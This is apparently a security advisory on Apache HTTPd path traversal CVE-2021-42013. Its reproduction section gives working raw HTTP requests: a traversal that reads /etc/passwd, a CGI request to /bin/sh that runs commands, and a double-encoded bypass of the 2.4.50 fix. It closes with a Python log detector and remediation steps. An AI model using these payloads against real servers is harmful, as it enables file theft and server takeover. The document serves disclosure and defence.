Vulnerability overview
Apache HTTPd is a popular open-source HTTP server maintained by the Apache Foundation. On 8 October 2021 the Apache HTTPd project released a security update disclosing CVE-2021-42013, a path traversal vulnerability in Apache HTTPd 2.4.49/2.4.50. Because the fix for CVE-2021-41773 (the path traversal vulnerability in Apache HTTPd 2.4.49) was incomplete, an attacker can craft a request that bypasses the patch and uses the traversal to read files outside the web directory. If CGI support is enabled in Apache HTTPd, the attacker can also craft a request that executes commands and takes control of the server.
Affected versions
Apache HTTPd 2.4.49
Apache HTTPd 2.4.50
Vulnerability conditions
1. Directory traversal is configured and cgi mode is enabled
2. The Apache HTTPd version is 2.4.49/2.4.50
3. The cgi-bin and icons folders exist
Vulnerability reproduction
GET request, directory traversal:
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
payload:
/icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
POST request, command execution:
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 192.168.159.134:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
echo;whoami
payload:
/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
echo;whoami
Apache HTTPd 2.4.50's fix for the previous version was incomplete, so 2.4.50 is also affected by this vulnerability.
GET payload:
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
POST payload:
/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;whoami
It is enough to URL-encode the previous version's payload one more time.
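On the defensive side, a log review that decodes the request path only once misses the double-encoded bypass above. The following is an added example (not part of the original writeup) that percent-decodes each logged path until it stops changing, then walks the segments to see whether the request climbed out of its top-level directory (cgi-bin or icons); the access-log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache common-log style); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Oct/2021:10:00:01 +0000] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326
10.0.0.7 - - [08/Oct/2021:10:00:02 +0000] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1234
10.0.0.9 - - [08/Oct/2021:10:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 20
10.0.0.2 - - [08/Oct/2021:10:00:04 +0000] "GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 403 199
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def fully_decode(path, max_rounds=3):
    """Percent-decode until the string stops changing, so the double-encoded
    '.%%32%65' collapses to '.%2e' and then to '..' (the 2.4.50 bypass)."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def min_depth(decoded_path):
    """Walk the decoded path segments below the first one (the aliased
    directory, e.g. cgi-bin or icons) and return the lowest depth reached.
    A negative value means the request climbed out of that directory."""
    segs = [s for s in decoded_path.split("?", 1)[0].split("/") if s not in ("", ".")]
    depth = lowest = 0
    for seg in segs[1:]:
        depth += -1 if seg == ".." else 1
        lowest = min(lowest, depth)
    return lowest

def find_traversals(log_text):
    """Return (method, raw_path, decoded_path) for every request whose
    decoded path escapes its top-level directory."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        decoded = fully_decode(m.group("path"))
        if min_depth(decoded) < 0:
            hits.append((m.group("method"), m.group("path"), decoded))
    return hits

if __name__ == "__main__":
    for method, raw, decoded in find_traversals(SAMPLE_LOG):
        print(f"{method} {raw} -> {decoded}")
```

Note that the 403 on the last constructed line still counts as an attempt: the detector keys on the decoded path, not on the status code.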
Remediation recommendations
1. Upgrade to a version above 2.4.50
2. Disable directory traversal
3. Disable cgi mode